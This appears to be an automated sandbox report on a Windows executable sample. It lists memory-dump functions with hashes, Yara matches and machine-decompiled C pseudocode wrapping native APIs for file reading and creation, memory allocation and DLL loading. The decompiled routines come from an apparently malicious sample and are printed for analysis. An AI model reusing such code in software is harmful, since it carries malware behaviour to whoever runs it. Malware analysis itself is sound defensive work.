Instruction Fuzzy Hash: 1C1114B2D003489FDB10CF9AC844ADEFBF4EB88314F15842AE519A7600C378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 007EA312, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007EA171,00000800,00000000,00000000), ref: 007EA382

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc68a004a50f46429592d5d88242f0afabbd65ce9667dd40b26914957acad770
Instruction ID: dc6824c7bb8a9df876332a4ac5e788ea0c0fc5d157d3b3c3c96e82fe0a9dce47
Opcode Fuzzy Hash: dc68a004a50f46429592d5d88242f0afabbd65ce9667dd40b26914957acad770
Instruction Fuzzy Hash: D51103B2D002499FCB10CF9AD484A9EFBF4FB88314F15842AE519A7600C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007EA090, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 007EA0F6

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3b7dc51bdefcd78e43703908bd1db1488cb3b01e452aa21c012ad7d2c8e7866a
Instruction ID: aa911e7f270e14093deb099491922a8d22963116c6fde9727a82df80a3bd6b9c
Opcode Fuzzy Hash: 3b7dc51bdefcd78e43703908bd1db1488cb3b01e452aa21c012ad7d2c8e7866a
Instruction Fuzzy Hash: C211E3B5C006499FCB10CF9AD844BDEFBF4EB89324F14842AD419B7600D379A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005ED1D8, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693669272.00000000005ED000.00000040.00000001.sdmp, Offset: 005ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52bb160314677d471743911c94c950bf4daff472ff3b2a28b94c1b1ffc5e45c1
Instruction ID: 16fed91b1b202b3d41018ac6471af6c7d9391c2cdddcd3c0402e95a2295f647a
Opcode Fuzzy Hash: 52bb160314677d471743911c94c950bf4daff472ff3b2a28b94c1b1ffc5e45c1
Instruction Fuzzy Hash: 5721F475504284DFCB09CF50D8C0B26BF76FB88314F2485A9EA454B246C336D816CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 005ED4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693669272.00000000005ED000.00000040.00000001.sdmp, Offset: 005ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b372ea444b39d7ac8055c2f8e24ebe5c75e56f04388638deff336ac4a1755e
Instruction ID: 10e6ef2a968201bb233bedc96719c703e82a528620caae301711d0a8e0a0c086
Opcode Fuzzy Hash: 74b372ea444b39d7ac8055c2f8e24ebe5c75e56f04388638deff336ac4a1755e
Instruction Fuzzy Hash: 5E2102B2504284DFDB09CF04D9C0B26BF75FB94328F24856AD9490A246C336D815CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 005FD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693706016.00000000005FD000.00000040.00000001.sdmp, Offset: 005FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce1a47582a6f9f68ac90a631b8ef4e277d1888118612b8ec404e84862dc9adf
Instruction ID: 7f64763a105a0dc82e1def648d091fc39239a4c75b3bd11206e8685a5e763759
Opcode Fuzzy Hash: 9ce1a47582a6f9f68ac90a631b8ef4e277d1888118612b8ec404e84862dc9adf
Instruction Fuzzy Hash: C9212571504208DFDB14DF10D8C8B26BF7AFB84314F30C969DA094B246DB3AD806CA71

Uniqueness

Uniqueness Score: -1.00%

Function 005FD006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693706016.00000000005FD000.00000040.00000001.sdmp, Offset: 005FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4dd2cde9c9ee6c517a1f6944ec5beedb8dfd6490d543b168484bd4eba3a332
Instruction ID: cda119a6a149c3d18988962a78b55b17670a980a5f799b6353818b92074689e8
Opcode Fuzzy Hash: 4f4dd2cde9c9ee6c517a1f6944ec5beedb8dfd6490d543b168484bd4eba3a332
Instruction Fuzzy Hash: F32180755093C48FCB02CF24D994715BF72FB46314F28C5EAD8498B657C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 005ED1D3, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693669272.00000000005ED000.00000040.00000001.sdmp, Offset: 005ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44fb247d1bb5e958eeef18b626255402b9bd434962cddae80e9a587325f560f9
Instruction ID: 47197d310daf9bf250a7cd316749cf32f22951571874aab66ee98a4136fa2907
Opcode Fuzzy Hash: 44fb247d1bb5e958eeef18b626255402b9bd434962cddae80e9a587325f560f9
Instruction Fuzzy Hash: 8B217F7A504280DFCB16CF50D9C4B16BF72FB84314F24C6A9DD484B656C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005ED49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693669272.00000000005ED000.00000040.00000001.sdmp, Offset: 005ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a2c64166ac97f75a50e72a7803d9723f54624e53934468d686dd02e51e2ec0
Instruction ID: 4aa13ba01078325b0c338ebf3ff5e65f4390fdd3d31173919dd5b5196a4b82f1
Opcode Fuzzy Hash: c9a2c64166ac97f75a50e72a7803d9723f54624e53934468d686dd02e51e2ec0
Instruction Fuzzy Hash: 9C11D376904280CFCF16CF14D5C4B16BF72FB84324F24C6AAD8450B656C336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 005ED731, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693669272.00000000005ED000.00000040.00000001.sdmp, Offset: 005ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77cad5866a27eb62581e740b19706a7a5b62cb5c94a2d8c7811515995a55144e
Instruction ID: 53d1ac2d2510a21a6a263849517eb8ddba151c52820c33a7e11d3fe4d62a638f
Opcode Fuzzy Hash: 77cad5866a27eb62581e740b19706a7a5b62cb5c94a2d8c7811515995a55144e
Instruction Fuzzy Hash: AA01A7714083C89AE7144B26CD84767FFA8FF41364F28845AEE845B282D3789C44C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 005ED730, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693669272.00000000005ED000.00000040.00000001.sdmp, Offset: 005ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c36bb10f6b010e7bfa63028fd65a60f9969bbc551b2c8ea8e54998e53972039
Instruction ID: 9d777a7d097b3c03350d60ed0af22a05da89aff46d0e61dde9d5ded29617a5ad
Opcode Fuzzy Hash: 5c36bb10f6b010e7bfa63028fd65a60f9969bbc551b2c8ea8e54998e53972039
Instruction Fuzzy Hash: 07F062714047849EEB148B16CD84B62FFA8EB81774F18C55AED485B286C3789C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000480A9, Relevance: .8, Instructions: 803COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693132347.0000000000042000.00000002.00020000.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.693122296.0000000000040000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2026ca66e66dfddba338373adc514206953184bfc1c405ac64f37043b729c3e
Instruction ID: e0fee3f944b6233120119b6a7b3f251abe8f91596bed05942aa0ee920790ee6c
Opcode Fuzzy Hash: a2026ca66e66dfddba338373adc514206953184bfc1c405ac64f37043b729c3e
Instruction Fuzzy Hash: 4462E27584F3C28FD7038B349CA6591BFB0AE1722836E09DBD4C0CF0A3D659695AD762

Uniqueness

Uniqueness Score: -1.00%

Function 007EF090, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c453fc12e569c40b2b3a296cea960f45c480e6cef4951e675f432b437ff69f0
Instruction ID: e73bfab28340a28c7f37f1a79aa275277c06ff61feda99d890e1b1e54cfe0eac
Opcode Fuzzy Hash: 7c453fc12e569c40b2b3a296cea960f45c480e6cef4951e675f432b437ff69f0
Instruction Fuzzy Hash: FF126BB1C11A868AE310CFB5FDDC1893BA1B7453ACB904328D2612FAE1D7B8154BCF94

Uniqueness

Uniqueness Score: -1.00%

Function 007ECCCC, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebabdf112f69ee63725689d13b4fb128a511baaaaa8aadc7d8076c74460007d9
Instruction ID: b7073babd2a019fd86b3ada1c539fecdbec39b6a51a2431aa31dbf806ff141c8
Opcode Fuzzy Hash: ebabdf112f69ee63725689d13b4fb128a511baaaaa8aadc7d8076c74460007d9
Instruction Fuzzy Hash: 58A1A036E00649CFCF05DFA6C8449DEBBB2FF89300B15856AE805BB261EB35A915CF40

Uniqueness

Uniqueness Score: -1.00%

Function 007EF082, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.693847344.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c29ee02dc340a83761c5bdf4617a9b866b18a6ee8e70019d594bb6fe31cbcf
Instruction ID: 970c9b7823bd32530e1a7906204a532983510a8b05f7ec55d70e55486c74c890
Opcode Fuzzy Hash: b7c29ee02dc340a83761c5bdf4617a9b866b18a6ee8e70019d594bb6fe31cbcf
Instruction Fuzzy Hash: 23C1D1B1C11B868AD710CFB5FCC81897BA1BB8536CB514328D2616FAE1E7B8154BCF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 56460021473877.exe PID: 5276 Parent PID: 5240 56460021473877.exeCOMMON

Executed Functions

Function 0041866A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5

Strings

r=A, xrefs: 00418692, 004186A0
1:A, xrefs: 0041868C, 00418698
r=A, xrefs: 004186AD, 004186B4

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: 795b3cea06950a5458e02da3cb669bc8341ae9300645c8ba2d61e0795b7a3d24
Instruction ID: 032987d9278aa7aaa25981681cd2f0d3834136b386e9cc9a53835d24eca0938f
Opcode Fuzzy Hash: 795b3cea06950a5458e02da3cb669bc8341ae9300645c8ba2d61e0795b7a3d24
Instruction Fuzzy Hash: 3B11D2B2200109AFCB04DF99DC90DEB77ADAF8C754B158649FE0DE3251D634EC518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418670, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418670(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191C0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418673
0x0041867f
0x00418687
0x0041868c
0x00418692
0x004186ad
0x004186b5
0x004186b9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5

Strings

r=A, xrefs: 00418692, 004186A0
1:A, xrefs: 0041868C, 00418698
r=A, xrefs: 004186AD, 004186B4

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: f9e3a3d0e989e08c3f59baf01a417991646d82ee4afc000ab6c713d5a761e92c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 12F0F4B2200208ABCB04DF89CC80EEB77ADAF8C714F018248BA0D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B370(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B5F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419700(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b5c
0x00409b5f
0x00409b64
0x00409b69
0x00409b73
0x00409b78
0x00409b7b
0x00409b7d
0x00409b85
0x00409b8a
0x00409b8a
0x00409b91
0x00409b99
0x00409b9c
0x00409b9e
0x00409bb2
0x00000000
0x00409bb4
0x00409bba
0x00409b6e
0x00409b6e
0x00409b6e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: 122e155802c76e8fe71ecbd5f026ee28347fd4ee7a5d85f817b14445866b07dd
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: 55014CB5D0020DBBDF10DAA1EC42FDEB378AB54318F0441AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004185C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191C0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185cf
0x004185d7
0x0041860d
0x00418611

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041860D

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 8eb6fbd051b3d6e3bdc80b0b17e8b32b36fddcadecc1da7b7e8bd51c52942836
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 9DF0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004185BB, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185BB(signed int __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t32 = __edi | 0x553048f4;
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E004191C0(_t32, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185bb
0x004185c3
0x004185cf
0x004185d7
0x0041860d
0x00418611

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041860D

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 45a6feeeaaffede49789751af9593a02af750e6f673d478a4f5d33433d7855b5
Instruction ID: 2dcb32300c92544435577be74ea2813f46015451da4a64ff0bd7080a21d00fb9
Opcode Fuzzy Hash: 45a6feeeaaffede49789751af9593a02af750e6f673d478a4f5d33433d7855b5
Instruction Fuzzy Hash: 20F0BDB2200208ABDB08CF89DC95EEB77A9AF8C754F158648FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191C0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187af
0x004187b7
0x004187d9
0x004187dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419394,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187D9

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 25d322934daf616d54f73205e359e97dd0d0108bb283116572f6f6fe365e7cad
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: F5F015B2200208ABDB14DF89CC81EEB77ADAF88754F118549FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004186EA, Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004186EA(void* __eax, void* _a4) {
				intOrPtr _v0;
				long _t9;
				void* _t12;

				asm("sbb esp, ebp");
				asm("sbb dl, [gs:edx+0x55]");
				_t6 = _v0;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x409763
				E004191C0(_t12, _v0, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a4); // executed
				return _t9;
			}

0x004186ea
0x004186ed
0x004186f3
0x004186f6
0x004186ff
0x00418707
0x00418715
0x00418719

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418715

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 817cbbb5c4312a1ed46d04540fb33de4b1bcbdd89edbd7b7446656a924039c8d
Instruction ID: 79a1d58875b57759af6dd4cc1c6ef6f30665336d407b609fc4652a6710326c33
Opcode Fuzzy Hash: 817cbbb5c4312a1ed46d04540fb33de4b1bcbdd89edbd7b7446656a924039c8d
Instruction Fuzzy Hash: B1E0C2792402147BD710EFA8CC86EE77B6CEF49750F054599FE589B242C130E944C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 004186F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004186F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191C0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004186f3
0x004186f6
0x004186ff
0x00418707
0x00418715
0x00418719

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418715

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 0b0e29a7bb3afeb76cf53b9d16d6e0c91c86644eaa2e8498d895191de08f0161
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7DD01776200214BBEB10EB99CC89EE77BACEF48760F154499BA189B242C530FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088D0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0D0( &_v284, 0x104);
						E0041A740( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088db
0x004088e3
0x004088e5
0x004088ea
0x004088ef
0x00408902
0x00408907
0x00408910
0x0040891c
0x0040892f
0x00408934
0x00408937
0x00408940
0x00408952
0x00408957
0x0040895c
0x00000000
0x00000000
0x0040895e
0x00408962
0x00000000
0x00000000
0x00408964
0x00000000
0x00408962
0x00408966
0x00408969
0x0040896f
0x00408971
0x0040897c
0x00408981
0x00408984
0x00408991
0x0040899c
0x0040899e
0x004089a4
0x004089a8
0x004089ab
0x004089ab
0x004089b2
0x004089b5
0x004089ba
0x004089c7
0x004088f6
0x004088f6
0x004088f6

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4306667aa9f532a2ed7b70f283dd30ae88db4e50b66cecac2bda7e96507e56ad
Instruction ID: cb3335a1e64584eb07a4ea91dadddbc29470679c3074ba74e55a49ec00779158
Opcode Fuzzy Hash: 4306667aa9f532a2ed7b70f283dd30ae88db4e50b66cecac2bda7e96507e56ad
Instruction Fuzzy Hash: ED21FBB2C4420957CB15E6649D42BFF737C9B54304F04057FE989A3181F639AB4987A7

Uniqueness

Uniqueness Score: -1.00%

Function 00418890, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418890(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191C0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188a7
0x004188b2
0x004188bd
0x004188c1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188BD

Strings

65A, xrefs: 004188B2, 004188BC

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 5c156194473f1d05c310d89676d9f0526131e4dffca8646f7b57c59a0eef6258
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 34E012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A120( &_v67, 0, 0x3f);
				E0041AD00( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_t12, _a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
Instruction ID: 9e9773ac0b0102b9350b3534e018efb02758e459cfd39c42d1aa5cef431ad939
